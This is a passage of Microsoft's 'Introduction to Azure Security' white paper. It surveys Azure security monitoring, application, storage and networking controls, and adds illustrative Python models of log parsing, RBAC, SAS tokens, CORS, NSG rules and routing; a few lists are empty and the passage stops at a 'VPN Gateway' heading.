Introduction to Azure Security

Overview

We know that security is job one in the cloud and how important it is that you find accurate and timely information about Azure security. One of the best reasons to use Azure for your applications and services is to take advantage of its wide array of security tools and capabilities. These tools and capabilities help make it possible to create secure solutions on the secure Azure platform. Microsoft Azure provides confidentiality, integrity, and availability of customer data, while also enabling transparent accountability.

To help you better understand the collection of security controls implemented within Microsoft Azure from both the customer's and Microsoft operations' perspectives, this white paper, "Introduction to Azure Security", is written to provide a comprehensive look at the security available with Microsoft Azure.

Azure Platform

Azure is a public cloud service platform that supports a broad selection of operating systems, programming languages, frameworks, tools, databases, and devices. It can run Linux containers with Docker integration; build apps with JavaScript, Python, .NET, PHP, Java, and Node.js; and build back-ends for iOS, Android, and Windows devices.

Azure public cloud services support the same technologies millions of developers and IT professionals already rely on and trust. When you build on, or migrate IT assets to, a public cloud service provider, you are relying on that organization's ability to protect your applications and data with the services and the controls they provide to manage the security of your cloud-based assets.

Azure's infrastructure is designed from facility to applications for hosting millions of customers simultaneously, and it provides a trustworthy foundation upon which businesses can meet their security requirements.

In addition, Azure provides you with a wide array of configurable security options and the ability to control them so that you can customize security to meet the unique requirements of your organization's deployments. This document helps you understand how Azure security capabilities can help you fulfill these requirements.

Note

The primary focus of this document is on customer-facing controls that you can use to customize and increase security for your applications and services.

We do provide some overview information, but for detailed information on how Microsoft secures the Azure platform itself, see the information provided in the Microsoft Trust Center.

Abstract

Initially, public cloud migrations were driven by cost savings and agility to innovate. Security was considered a major concern for some time, and even a show stopper, for public cloud migration. However, public cloud security has transitioned from a major concern to one of the drivers for cloud migration. The rationale behind this is the superior ability of large public cloud service providers to protect applications and the data of cloud-based assets.

Azure's infrastructure is designed from the facility to applications for hosting millions of customers simultaneously, and it provides a trustworthy foundation upon which businesses can meet their security needs. In addition, Azure provides you with a wide array of configurable security options and the ability to control them so that you can customize security to meet the unique requirements of your deployments, meet your IT control policies, and adhere to external regulations.

This paper outlines Microsoft's approach to security within the Microsoft Azure cloud platform:

  • Security features implemented by Microsoft to secure the Azure infrastructure, customer data, and applications.
  • Azure services and security features available to you to manage the security of the services and your data within your Azure subscriptions.

Summary of Azure Security Capabilities

The following table provides a brief description of the security features implemented by Microsoft to secure the Azure infrastructure, customer data, and applications.

Security Features Implemented to Secure the Azure Platform:

The features listed below are capabilities you can review to gain assurance that the Azure platform is managed in a secure manner. Links have been provided for further drill-down on how Microsoft addresses customer trust questions in four areas: Secure Platform, Privacy & Controls, Compliance, and Transparency.

Secure Platform
  • Security Development Cycle, internal audits
  • Mandatory security training, background checks
  • Penetration testing, intrusion detection, DDoS, audits & logging
  • State-of-the-art data centers, physical security, secure network
  • Security incident response, shared responsibility

Privacy & Controls
  • Manage your data all the time
  • Control over data location
  • Provide data access on your terms
  • Responding to law enforcement
  • Stringent privacy standards

Compliance
  • Trust Center
  • Common Controls Hub
  • The Cloud Services Due Diligence Checklist
  • Compliance by service, location, and industry
  • Review certifications for Azure services, Transparency Hub

Transparency
  • How Microsoft secures customer data in Azure services
  • How Microsoft manages data location in Azure services
  • Who in Microsoft can access your data and on what terms
  • How Microsoft secures customer data in Azure services

Security Features Offered by Azure to Secure Data and Applications

Depending on the cloud service model, responsibility for managing the security of the application or service varies. There are capabilities available in the Azure platform to assist you in meeting these responsibilities through built-in features and through partner solutions that can be deployed into an Azure subscription.

The built-in capabilities are organized in six (6) functional areas: Operations, Applications, Storage, Networking, Compute, and Identity. Additional detail on the features and capabilities available in the Azure platform in these six (6) areas is provided through summary information.

Operations

This section provides additional information regarding key features in security operations and summary information about these capabilities.

Security and Audit Dashboard

The Security and Audit solution provides a comprehensive view into your organization's IT security posture with built-in search queries for notable issues that require your attention. The Security and Audit dashboard is the home screen for everything related to security in Azure Monitor logs. It provides high-level insight into the security state of your computers. It also includes the ability to view all events from the past 24 hours, 7 days, or any other custom time frame.

In addition, you can configure Security & Compliance to automatically carry out specific actions when a specific event is detected.

Azure Resource Manager

Azure Resource Manager enables you to work with the resources in your solution as a group. You can deploy, update, or delete all the resources for your solution in a single, coordinated operation. You use an Azure Resource Manager template for deployment, and that template can work for different environments such as testing, staging, and production. Resource Manager provides security, auditing, and tagging features to help you manage your resources after deployment.

Azure Resource Manager template-based deployments help improve the security of solutions deployed in Azure because standard security control settings can be integrated into standardized template-based deployments. This reduces the risk of security configuration errors that might take place during manual deployments.

Application Insights

Application Insights is an extensible Application Performance Management (APM) service for web developers. With Application Insights, you can monitor your live web applications and automatically detect performance anomalies. It includes powerful analytics tools to help you diagnose issues and to understand what users actually do with your apps. It monitors your application all the time it's running, both during testing and after you've published or deployed it.

Application Insights creates charts and tables that show you, for example, what times of day you get most users, how responsive the app is, and how well it is served by any external services that it depends on.

If there are crashes, failures, or performance issues, you can search through the telemetry data in detail to diagnose the cause. The service also sends you emails if there are any changes in the availability and performance of your app. Application Insights thus becomes a valuable security tool because it helps with the availability leg of the confidentiality, integrity, and availability security triad.

Azure Monitor

Azure Monitor offers visualization, query, routing, alerting, auto scale, and automation on data both from the Azure infrastructure (Activity Log) and each individual Azure resource (Diagnostic Logs). You can use Azure Monitor to alert you on security-related events that are generated in Azure logs.

Azure Monitor logs

Azure Monitor logs provide an IT management solution for both on-premises and third-party cloud-based infrastructure (such as AWS) in addition to Azure resources. Data from Azure Monitor can be routed directly to Azure Monitor logs so you can see metrics and logs for your entire environment in one place.

Azure Monitor logs can be a useful tool in forensic and other security analysis, as the tool enables you to quickly search through large amounts of security-related entries with a flexible query approach. In addition, on-premises firewall and proxy logs can be exported into Azure and made available for analysis using Azure Monitor logs.

Azure Advisor

Azure Advisor is a personalized cloud consultant that helps you to optimize your Azure deployments. It analyzes your resource configuration and usage telemetry. It then recommends solutions to help improve the performance, security, and high availability of your resources while looking for opportunities to reduce your overall Azure spend. Azure Advisor provides security recommendations, which can significantly improve your overall security posture for solutions you deploy in Azure. These recommendations are drawn from security analysis performed by Azure Security Center.

Azure Security Center

Azure Security Center helps you prevent, detect, and respond to threats with increased visibility into and control over the security of your Azure resources. It provides integrated security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of security solutions.

In addition, Azure Security Center helps with security operations by providing you a single dashboard that surfaces alerts and recommendations that can be acted upon immediately. Often, you can remediate issues with a single click within the Azure Security Center console.

Applications

This section provides additional information regarding key features in application security and summary information about these capabilities.

Web Application vulnerability scanning

One of the easiest ways to get started with testing for vulnerabilities on your App Service app is to use the integration with Tinfoil Security to perform one-click vulnerability scanning on your app. You can view the test results in an easy-to-understand report and learn how to fix each vulnerability with step-by-step instructions.

Penetration Testing

If you prefer to perform your own penetration tests or want to use another scanner suite or provider, you must follow the Azure penetration testing approval process and obtain prior approval to perform the desired penetration tests.

Web Application firewall

The web application firewall (WAF) in Azure Application Gateway helps protect web applications from common web-based attacks like SQL injection, cross-site scripting attacks, and session hijacking. It comes preconfigured with protection from threats identified by the Open Web Application Security Project (OWASP) as the top 10 common vulnerabilities.

Authentication and authorization in Azure App Service

App Service Authentication / Authorization is a feature that provides a way for your application to sign in users so that you don't have to change code on the app backend. It provides an easy way to protect your application and work with per-user data.

Layered Security Architecture

Since App Service Environments provide an isolated runtime environment deployed into an Azure Virtual Network, developers can create a layered security architecture providing differing levels of network access for each application tier. A common desire is to hide API back-ends from general Internet access and only allow APIs to be called by upstream web apps. Network Security Groups (NSGs) can be used on Azure Virtual Network subnets containing App Service Environments to restrict public access to API applications.

Web server diagnostics and application diagnostics

App Service web apps provide diagnostic functionality for logging information from both the web server and the web application. These are logically separated into web server diagnostics and application diagnostics. Web server diagnostics includes two major advances in diagnosing and troubleshooting sites and applications.

The first new feature is real-time state information about application pools, worker processes, sites, application domains, and running requests. The second new advantage is the detailed trace events that track a request throughout the complete request-and-response process.

To enable the collection of these trace events, IIS 7 can be configured to automatically capture full trace logs, in XML format, for any particular request based on elapsed time or error response codes.

Web server diagnostics

You can enable or disable the following kinds of logs:

  • Detailed Error Logging - Detailed error information for HTTP status codes that indicate a failure (status code 400 or greater). This may contain information that can help determine why the server returned the error code.

  • Failed Request Tracing - Detailed information on failed requests, including a trace of the IIS components used to process the request and the time taken in each component. This can be useful if you are attempting to increase site performance or isolate what is causing a specific HTTP error to be returned.

  • Web Server Logging - Information about HTTP transactions using the W3C extended log file format. This is useful when determining overall site metrics such as the number of requests handled or how many requests are from a specific IP address.
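The metrics the web server log is meant to answer (requests handled, requests per client IP, failures) fall out of the W3C extended format's #Fields directive once it is parsed. The following is an added example, not code from the page or from Microsoft: the log lines are constructed, and the field list mirrors a typical IIS configuration, but the parser reads whatever #Fields line the file declares.

```python
"""Parse W3C extended log lines (IIS style) and derive site metrics."""
from collections import Counter

# Constructed sample log, not captured from a real server. IIS writes one
# space-separated record per request and '-' for an empty field; spaces
# inside values such as the user agent are encoded as '+'.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 8.0
#Version: 1.0
#Date: 2024-01-15 10:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-01-15 10:00:01 10.0.0.4 GET /index.html - 80 - 203.0.113.10 Mozilla/5.0 200 0 0 15
2024-01-15 10:00:02 10.0.0.4 GET /admin - 80 - 203.0.113.10 Mozilla/5.0 404 0 2 3
2024-01-15 10:00:05 10.0.0.4 POST /api/orders - 80 - 198.51.100.7 curl/8.0 200 0 0 120
2024-01-15 10:00:07 10.0.0.4 GET /api/orders id=1 80 - 198.51.100.7 curl/8.0 500 0 0 2048
2024-01-15 10:00:09 10.0.0.4 GET /index.html - 80 - 203.0.113.10 Mozilla/5.0 200 0 0 11
"""

INT_FIELDS = {"s-port", "sc-status", "sc-substatus", "sc-win32-status", "time-taken"}


def parse_w3c_log(text):
    """Return one dict per request line, keyed by the names in the #Fields directive."""
    fields = None
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # other directives (#Software, #Date, ...) carry no request data
        if fields is None:
            raise ValueError("data line before #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(values)}: {line!r}")
        record = {}
        for name, value in zip(fields, values):
            if value == "-":
                record[name] = None
            elif name in INT_FIELDS:
                record[name] = int(value)
            else:
                record[name] = value
        records.append(record)
    return records


def summarize(records):
    """Site metrics: total requests, requests per client IP, failures, slowest URI."""
    by_ip = Counter(r["c-ip"] for r in records)
    errors = [r for r in records if r["sc-status"] >= 400]
    slowest = max(records, key=lambda r: r["time-taken"]) if records else None
    return {
        "total": len(records),
        "by_client_ip": dict(by_ip),
        "error_count": len(errors),
        "error_status_codes": Counter(r["sc-status"] for r in errors),
        "slowest_uri": slowest["cs-uri-stem"] if slowest else None,
    }


if __name__ == "__main__":
    print(summarize(parse_w3c_log(SAMPLE_LOG)))
```

Because the parser is driven by the #Fields line, adding or removing columns in the IIS logging configuration does not break it; a line whose column count disagrees with the directive is rejected rather than silently misattributed.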

Application diagnostics

Application diagnostics allows you to capture information produced by a web application. ASP.NET applications can use the System.Diagnostics.Trace class to log information to the application diagnostics log. In Application Diagnostics, there are two major types of events: those related to application performance and those related to application failures and errors. The failures and errors can be divided further into connectivity, security, and failure issues. Failure issues are typically related to a problem with the application code.

In Application Diagnostics, you can view events grouped in these ways:

  • All (displays all events)
  • Application Errors (displays exception events)
  • Performance (displays performance events)

Storage

This section provides additional information regarding key features in Azure storage security and summary information about these capabilities.

Role-Based Access Control (RBAC)

You can secure your storage account with Role-Based Access Control (RBAC). Restricting access based on the need-to-know and least-privilege security principles is imperative for organizations that want to enforce security policies for data access. These access rights are granted by assigning the appropriate RBAC role to groups and applications at a certain scope. You can use built-in RBAC roles, such as Storage Account Contributor, to assign privileges to users. Access to the storage keys for a storage account using the Azure Resource Manager model can be controlled through RBAC.
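The two ideas in that paragraph, a role assigned at a scope and the scope inheriting downward through subscription, resource group and resource, are easy to model. Below is an added example (not Microsoft's code and not the real Azure authorization engine): the action strings follow the Azure resource-provider naming style, but the role definitions are simplified, the "Storage Operator (no keys)" role is hypothetical, and the subscription ID and resource names are constructed.

```python
"""Scope-inherited role assignments with Actions/NotActions, Azure RBAC style."""
from dataclasses import dataclass
from fnmatch import fnmatchcase

# Action identifiers in Azure's resource-provider naming style.
READ = "Microsoft.Storage/storageAccounts/read"
WRITE = "Microsoft.Storage/storageAccounts/write"
LIST_KEYS = "Microsoft.Storage/storageAccounts/listKeys/action"


@dataclass(frozen=True)
class RoleDefinition:
    name: str
    actions: tuple
    not_actions: tuple = ()     # subtracted from actions; never grants anything


@dataclass(frozen=True)
class RoleAssignment:
    principal: str
    role: RoleDefinition
    scope: str                  # subscription, resource group or single resource ID


# Simplified action sets (assumption), not the full built-in definitions.
READER = RoleDefinition("Reader", ("*/read",))
STORAGE_ACCOUNT_CONTRIBUTOR = RoleDefinition(
    "Storage Account Contributor", ("Microsoft.Storage/storageAccounts/*",))
# Hypothetical custom role: manage accounts but never retrieve the account keys.
STORAGE_OPERATOR_NO_KEYS = RoleDefinition(
    "Storage Operator (no keys)", ("Microsoft.Storage/storageAccounts/*",), (LIST_KEYS,))

# Constructed resource IDs.
SUB = "/subscriptions/00000000-0000-0000-0000-000000000000"
RG = SUB + "/resourceGroups/rg-app"
ACCOUNT = RG + "/providers/Microsoft.Storage/storageAccounts/stapp001"
OTHER_ACCOUNT = SUB + "/resourceGroups/rg-other/providers/Microsoft.Storage/storageAccounts/stother001"

ASSIGNMENTS = (
    RoleAssignment("alice", READER, SUB),                            # whole subscription
    RoleAssignment("backup-app", STORAGE_ACCOUNT_CONTRIBUTOR, ACCOUNT),  # one account only
    RoleAssignment("ops-team", STORAGE_OPERATOR_NO_KEYS, RG),        # one resource group
)


def scope_covers(assignment_scope, resource_id):
    """A scope covers itself and everything beneath it; the '/' guard stops
    'rg-app' from matching a sibling called 'rg-app2'."""
    return resource_id == assignment_scope or resource_id.startswith(assignment_scope + "/")


def _matches(action, patterns):
    # Action names are compared case-insensitively; '*' spans path segments.
    return any(fnmatchcase(action.lower(), p.lower()) for p in patterns)


def role_permits(role, action):
    return _matches(action, role.actions) and not _matches(action, role.not_actions)


def is_allowed(principal, action, resource_id, assignments=ASSIGNMENTS):
    """True if any assignment for the principal covers the resource and permits the action."""
    return any(
        a.principal == principal and scope_covers(a.scope, resource_id) and role_permits(a.role, action)
        for a in assignments
    )


if __name__ == "__main__":
    for who, what in [("alice", LIST_KEYS), ("backup-app", LIST_KEYS), ("ops-team", LIST_KEYS)]:
        print(who, what.rsplit("/", 2)[-2], is_allowed(who, what, ACCOUNT))
```

The `listKeys` action is the one to watch: anyone who can list the account keys holds credentials that bypass RBAC entirely for data-plane calls, so keeping it out of day-to-day roles (as the hypothetical operator role does via NotActions) is the least-privilege point the paragraph makes.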

Shared Access Signature

A shared access signature (SAS) provides delegated access to resources in your storage account. The SAS means that you can grant a client limited permissions to objects in your storage account for a specified period and with a specified set of permissions. You can grant these limited permissions without having to share your account access keys.
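What makes a SAS safe to hand out is that the token carries its own permissions and validity window, and an HMAC over those claims computed with the account key binds them so the client can neither widen them nor forge a token. The block below is an added illustration of that mechanism, not Azure Storage's actual SAS implementation: the string-to-sign layout, the `sr` field holding a resource path, and the demo key, resource and clock are all assumptions for the example.

```python
"""Simplified model of shared access signatures: issue a scoped, time-limited
token signed with the account key, then authorize requests against it without
the client ever seeing the key."""
import base64
import hashlib
import hmac
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qs, urlencode

TIME_FMT = "%Y-%m-%dT%H:%M:%SZ"
# Constructed demo key in the base64 shape of an account key; not a real key.
ACCOUNT_KEY = base64.b64encode(b"constructed demo account key 0123456789abcdef").decode()
DEMO_RESOURCE = "reports/q1.csv"                                   # constructed
DEMO_NOW = datetime(2024, 1, 15, 12, 0, tzinfo=timezone.utc)       # constructed clock


def _string_to_sign(sp, st, se, sr, sv):
    # Every claim the server enforces is covered by the signature (layout is an assumption).
    return "\n".join([sp, st, se, sr, sv])


def _sign(account_key, string_to_sign):
    key = base64.b64decode(account_key)
    mac = hmac.new(key, string_to_sign.encode("utf-8"), hashlib.sha256).digest()
    return base64.b64encode(mac).decode()


def issue_sas(account_key, resource, permissions, start, expiry, version="2024-demo"):
    """Build the SAS query string for one resource; permissions are letters such as 'r' or 'rw'."""
    fields = {
        "sv": version,
        "sr": resource,        # here: the resource path (Azure's real scheme uses other fields)
        "sp": permissions,
        "st": start.strftime(TIME_FMT),
        "se": expiry.strftime(TIME_FMT),
    }
    fields["sig"] = _sign(account_key, _string_to_sign(
        fields["sp"], fields["st"], fields["se"], fields["sr"], fields["sv"]))
    return urlencode(fields)


def authorize(account_key, resource, query, requested_permission, now):
    """Server side: return (allowed, reason) for a request that presents a SAS."""
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if any(k not in params for k in ("sv", "sr", "sp", "st", "se", "sig")):
        return False, "malformed"
    if params["sr"] != resource:
        return False, "resource mismatch"
    expected = _sign(account_key, _string_to_sign(
        params["sp"], params["st"], params["se"], params["sr"], params["sv"]))
    # Constant-time compare; any edited claim yields a different expected MAC.
    if not hmac.compare_digest(expected, params["sig"]):
        return False, "signature"
    start = datetime.strptime(params["st"], TIME_FMT).replace(tzinfo=timezone.utc)
    expiry = datetime.strptime(params["se"], TIME_FMT).replace(tzinfo=timezone.utc)
    if now < start:
        return False, "not yet valid"
    if now >= expiry:
        return False, "expired"
    if requested_permission not in params["sp"]:
        return False, "permission"
    return True, "ok"


def demo_token(permissions="r"):
    """A read-only token valid from five minutes ago until one hour from DEMO_NOW."""
    return issue_sas(ACCOUNT_KEY, DEMO_RESOURCE, permissions,
                     DEMO_NOW - timedelta(minutes=5), DEMO_NOW + timedelta(hours=1))


def check_at(token, permission, hours_from_now=0, resource=DEMO_RESOURCE):
    """Authorize `token` for `permission` at DEMO_NOW shifted by the given hours."""
    return authorize(ACCOUNT_KEY, resource, token, permission, DEMO_NOW + timedelta(hours=hours_from_now))


if __name__ == "__main__":
    t = demo_token()
    print(t)
    print(check_at(t, "r"), check_at(t, "w"), check_at(t, "r", hours_from_now=2))
```

Two properties are worth checking explicitly: the issued query string never contains the account key, and changing `sp=r` to `sp=rw` in the token is rejected as a signature failure rather than being honoured.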

Encryption in Transit

Encryption in transit is a mechanism for protecting data when it is transmitted across networks. With Azure Storage, you can secure data using:

Encryption at rest

For many organizations, data encryption at rest is a mandatory step towards data privacy, compliance, and data sovereignty. There are three Azure storage security features that provide encryption of data that is "at rest":

Storage Analytics

Azure Storage Analytics performs logging and provides metrics data for a storage account. You can use this data to trace requests, analyze usage trends, and diagnose issues with your storage account. Storage Analytics logs detailed information about successful and failed requests to a storage service. This information can be used to monitor individual requests and to diagnose issues with a storage service. Requests are logged on a best-effort basis. The following types of authenticated requests are logged:

  • Successful requests.

  • Failed requests, including timeout, throttling, network, authorization, and other errors.

  • Requests using a Shared Access Signature (SAS), including failed and successful requests.

  • Requests to analytics data.

Enabling Browser-Based Clients Using CORS

Cross-Origin Resource Sharing (CORS) is a mechanism that allows domains to give each other permission to access each other's resources. The user agent sends extra headers to ensure that JavaScript code loaded from a certain domain is allowed to access resources located at another domain. The latter domain then replies with extra headers allowing or denying the original domain access to its resources.

Azure storage services now support CORS, so once you set the CORS rules for the service, a properly authenticated request made against the service from a different domain is evaluated to determine whether it is allowed according to the rules you have specified.
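The server-side half of that exchange is a rule evaluation: take the Origin, the requested method and the requested headers from the preflight, find the first rule that admits all three, and answer with the corresponding Access-Control-* headers, or with nothing. The following is an added example written for this page, not Microsoft's implementation; the rule fields mirror the names a storage CORS rule uses (AllowedOrigins, AllowedMethods, AllowedHeaders, ExposedHeaders, MaxAgeInSeconds) and the origins in the sample rules are constructed.

```python
"""First-match CORS rule evaluation for a preflight (OPTIONS) request."""
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass(frozen=True)
class CorsRule:
    allowed_origins: tuple          # exact origins, or ("*",) for any origin
    allowed_methods: tuple          # e.g. ("GET", "HEAD")
    allowed_headers: tuple = ()     # exact names or prefix patterns such as "x-ms-meta-*"
    exposed_headers: tuple = ()     # response headers the browser may read
    max_age_in_seconds: int = 0     # how long the browser may cache the preflight result


# Constructed rule set: one trusted front-end origin may read blobs.
STORAGE_CORS_RULES = [
    CorsRule(
        allowed_origins=("https://app.example.com",),
        allowed_methods=("GET", "HEAD"),
        allowed_headers=("x-ms-meta-*", "content-type"),
        exposed_headers=("x-ms-request-id",),
        max_age_in_seconds=300,
    ),
]


def _origin_allowed(rule, origin):
    return "*" in rule.allowed_origins or origin.lower() in (o.lower() for o in rule.allowed_origins)


def _headers_allowed(rule, requested):
    # Header names are case-insensitive; every requested header must hit some pattern.
    patterns = [p.lower() for p in rule.allowed_headers]
    return all(any(fnmatchcase(h.lower(), p) for p in patterns) for h in requested)


def evaluate_preflight(rules, origin, method, requested_headers=()):
    """Return the CORS response headers for the first matching rule, or None to deny."""
    for rule in rules:
        if not _origin_allowed(rule, origin):
            continue
        if method.upper() not in (m.upper() for m in rule.allowed_methods):
            continue
        if not _headers_allowed(rule, requested_headers):
            continue
        response = {
            "Access-Control-Allow-Origin": origin,           # echo the specific origin back
            "Access-Control-Allow-Methods": method.upper(),
            "Access-Control-Max-Age": str(rule.max_age_in_seconds),
        }
        if requested_headers:
            response["Access-Control-Allow-Headers"] = ", ".join(requested_headers)
        if rule.exposed_headers:
            response["Access-Control-Expose-Headers"] = ", ".join(rule.exposed_headers)
        return response
    return None


if __name__ == "__main__":
    print(evaluate_preflight(STORAGE_CORS_RULES, "https://app.example.com", "GET", ("x-ms-meta-owner",)))
    print(evaluate_preflight(STORAGE_CORS_RULES, "https://other.example.net", "GET"))
```

A denied preflight carries no Access-Control-Allow-Origin header at all, which is what makes the browser block the call; note that CORS only governs what a browser will let page script do, and does not replace the request's own authentication.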

Networking

This section provides additional information regarding key features in Azure network security and summary information about these capabilities.

Network Layer Controls

Network access control is the act of limiting connectivity to and from specific devices or subnets and represents the core of network security. The goal of network access control is to make sure that your virtual machines and services are accessible only to the users and devices to which you want them accessible.

Network Security Groups

A Network Security Group (NSG) is a basic stateful packet-filtering firewall, and it enables you to control access based on a 5-tuple. NSGs do not provide application-layer inspection or authenticated access controls. They can be used to control traffic moving between subnets within an Azure Virtual Network and traffic between an Azure Virtual Network and the Internet.
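The 5-tuple evaluation is worth seeing concretely: rules are walked in priority order (lowest number first), the first match decides, and Azure's default rules at priority 65000 and above catch whatever nothing else matched. This is an added example, not Microsoft's code or the real NSG engine: the VNet address space, subnet prefixes and rules are constructed, the "Internet" and "VirtualNetwork" tags are reduced to "outside the VNet" and "inside the VNet", and the default AllowAzureLoadBalancerInBound rule is omitted. Because an NSG is stateful, only the first packet of a flow is evaluated this way; return traffic is not.

```python
"""Priority-ordered 5-tuple rule evaluation in the style of an Azure NSG."""
import ipaddress
from dataclasses import dataclass

VNET_PREFIXES = [ipaddress.ip_network("10.0.0.0/16")]   # constructed VNet address space


@dataclass(frozen=True)
class Rule:
    name: str
    priority: int           # lower number wins; 100-4096 for user rules, 65000+ defaults
    direction: str          # "Inbound" or "Outbound"
    access: str             # "Allow" or "Deny"
    protocol: str           # "Tcp", "Udp" or "*"
    source: str             # CIDR, "*", "Internet" or "VirtualNetwork"
    source_port: str        # "*", "443" or "1024-65535"
    destination: str
    destination_port: str


def _match_address(spec, ip_text):
    ip = ipaddress.ip_address(ip_text)
    in_vnet = any(ip in net for net in VNET_PREFIXES)
    if spec == "*":
        return True
    if spec == "VirtualNetwork":
        return in_vnet
    if spec == "Internet":
        return not in_vnet          # simplification of the Internet service tag
    return ip in ipaddress.ip_network(spec, strict=False)


def _match_port(spec, port):
    if spec == "*":
        return True
    if "-" in spec:
        lo, hi = (int(p) for p in spec.split("-"))
        return lo <= port <= hi
    return port == int(spec)


def _match_protocol(spec, protocol):
    return spec == "*" or spec.lower() == protocol.lower()


# Azure's default inbound rules (AllowAzureLoadBalancerInBound left out here).
DEFAULT_INBOUND = [
    Rule("AllowVnetInBound", 65000, "Inbound", "Allow", "*", "VirtualNetwork", "*", "VirtualNetwork", "*"),
    Rule("DenyAllInBound", 65500, "Inbound", "Deny", "*", "*", "*", "*", "*"),
]

# Constructed NSG for a web subnet 10.0.1.0/24; 10.0.2.0/24 is an app subnet.
WEB_SUBNET_NSG = [
    Rule("AllowHttpsFromInternet", 100, "Inbound", "Allow", "Tcp", "Internet", "*", "10.0.1.0/24", "443"),
    Rule("DenyRdpFromAppSubnet", 200, "Inbound", "Deny", "Tcp", "10.0.2.0/24", "*", "10.0.1.0/24", "3389"),
] + DEFAULT_INBOUND


def evaluate(rules, direction, protocol, src_ip, src_port, dst_ip, dst_port):
    """Return (access, rule_name) of the first matching rule in priority order."""
    for r in sorted((r for r in rules if r.direction == direction), key=lambda r: r.priority):
        if (_match_protocol(r.protocol, protocol)
                and _match_address(r.source, src_ip) and _match_port(r.source_port, src_port)
                and _match_address(r.destination, dst_ip) and _match_port(r.destination_port, dst_port)):
            return r.access, r.name
    return "Deny", "implicit"   # unreachable with the default rules present; kept as a safe fallback


if __name__ == "__main__":
    print(evaluate(WEB_SUBNET_NSG, "Inbound", "Tcp", "203.0.113.9", 51000, "10.0.1.4", 443))
    print(evaluate(WEB_SUBNET_NSG, "Inbound", "Tcp", "203.0.113.9", 51000, "10.0.1.4", 22))
    print(evaluate(WEB_SUBNET_NSG, "Inbound", "Tcp", "10.0.2.5", 51000, "10.0.1.4", 22))
```

The third call shows the trap the defaults set: SSH from the app subnet is allowed by AllowVnetInBound even though no user rule mentions it, so subnet-to-subnet restrictions need explicit Deny rules at a lower priority number, as the RDP rule does.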

Route Control and Forced Tunneling

The ability to control routing behavior on your Azure Virtual Networks is a critical network security and access control capability. For example, if you want to make sure that all traffic to and from your Azure Virtual Network goes through a virtual security appliance, you need to be able to control and customize routing behavior. You can do this by configuring User-Defined Routes in Azure.

User-Defined Routes allow you to customize inbound and outbound paths for traffic moving into and out of individual virtual machines or subnets to ensure the most secure route possible. Forced tunneling is a mechanism you can use to ensure that your services are not allowed to initiate a connection to devices on the Internet.

This is different from being able to accept incoming connections and then responding to them. Front-end web servers need to respond to requests from Internet hosts, and so Internet-sourced traffic is allowed inbound to these web servers and the web servers can respond.

Forced tunneling is commonly used to force outbound traffic to the Internet to go through on-premises security proxies and firewalls.
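Forced tunneling is nothing more than a user-defined 0.0.0.0/0 route that overrides the system default of sending Internet-bound traffic straight out, with the next hop set to the VPN gateway (or a virtual appliance); longest-prefix matching still lets a more specific route win. The block below is an added example, not Microsoft's code or the real Azure route-selection logic, and it makes two simplifying assumptions: the VNet address space and the routes are constructed, and BGP-learned routes are ignored.

```python
"""Effective-route selection with user-defined routes and forced tunneling."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    prefix: str
    next_hop_type: str      # "VnetLocal", "Internet", "VirtualNetworkGateway", "VirtualAppliance", "None"
    next_hop_ip: str = None  # only meaningful for VirtualAppliance
    source: str = "User"    # "System" or "User"


# System routes Azure creates for a constructed VNet 10.0.0.0/16.
SYSTEM_ROUTES = [
    Route("10.0.0.0/16", "VnetLocal", source="System"),
    Route("0.0.0.0/0", "Internet", source="System"),
]

# Forced tunneling: all Internet-bound traffic goes to the on-premises side via the gateway.
FORCED_TUNNEL_UDR = [Route("0.0.0.0/0", "VirtualNetworkGateway")]

# Same idea, but inspected by a virtual appliance (constructed address 10.0.3.4)
# and with one carve-out prefix allowed to leave directly.
NVA_UDR = [
    Route("0.0.0.0/0", "VirtualAppliance", next_hop_ip="10.0.3.4"),
    Route("203.0.113.0/24", "Internet"),
]


def effective_routes(system_routes, user_routes):
    """A user-defined route replaces a system route that has the identical prefix."""
    by_prefix = {ipaddress.ip_network(r.prefix): r for r in system_routes}
    for r in user_routes:
        by_prefix[ipaddress.ip_network(r.prefix)] = r
    return list(by_prefix.values())


def lookup(routes, destination):
    """Longest-prefix match: the most specific matching prefix decides the next hop."""
    dst = ipaddress.ip_address(destination)
    best, best_len = None, -1
    for r in routes:
        net = ipaddress.ip_network(r.prefix)
        if dst in net and net.prefixlen > best_len:
            best, best_len = r, net.prefixlen
    return best


def next_hop(system_routes, user_routes, destination):
    """Convenience wrapper returning (next_hop_type, next_hop_ip) for a destination."""
    r = lookup(effective_routes(system_routes, user_routes), destination)
    return (r.next_hop_type, r.next_hop_ip) if r else (None, None)


if __name__ == "__main__":
    for udr in ([], FORCED_TUNNEL_UDR, NVA_UDR):
        print([next_hop(SYSTEM_ROUTES, udr, d) for d in ("10.0.1.7", "8.8.8.8", "203.0.113.5")])
```

Note the interaction with the previous section: a forced-tunnel route changes where a VM's own outbound connections go, but the NSG, being stateful, still lets a front-end VM answer an inbound connection from the Internet.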

Virtual Network Security Appliances

While Network Security Groups, User-Defined Routes, and forced tunneling provide you a level of security at the network and transport layers of the OSI model, there may be times when you want to enable security at higher levels of the stack. You can access these enhanced network security features by using an Azure partner network security appliance solution. You can find the most current Azure partner network security solutions by visiting the Azure Marketplace and searching for "security" and "network security."

Azure Virtual Network

An Azure virtual network (VNet) is a representation of your own network in the cloud. It is a logical isolation of the Azure network fabric dedicated to your subscription. You can fully control the IP address blocks, DNS settings, security policies, and route tables within this network. You can segment your VNet into subnets and place Azure IaaS virtual machines (VMs) and/or Cloud Services (PaaS role instances) on Azure Virtual Networks.

Additionally, you can connect the virtual network to your on-premises network using one of the connectivity options available in Azure. In essence, you can expand your network to Azure, with complete control over IP address blocks and the benefit of the enterprise scale Azure provides.

Azure networking supports various secure remote access scenarios. Some of these include:

VPN Gateway

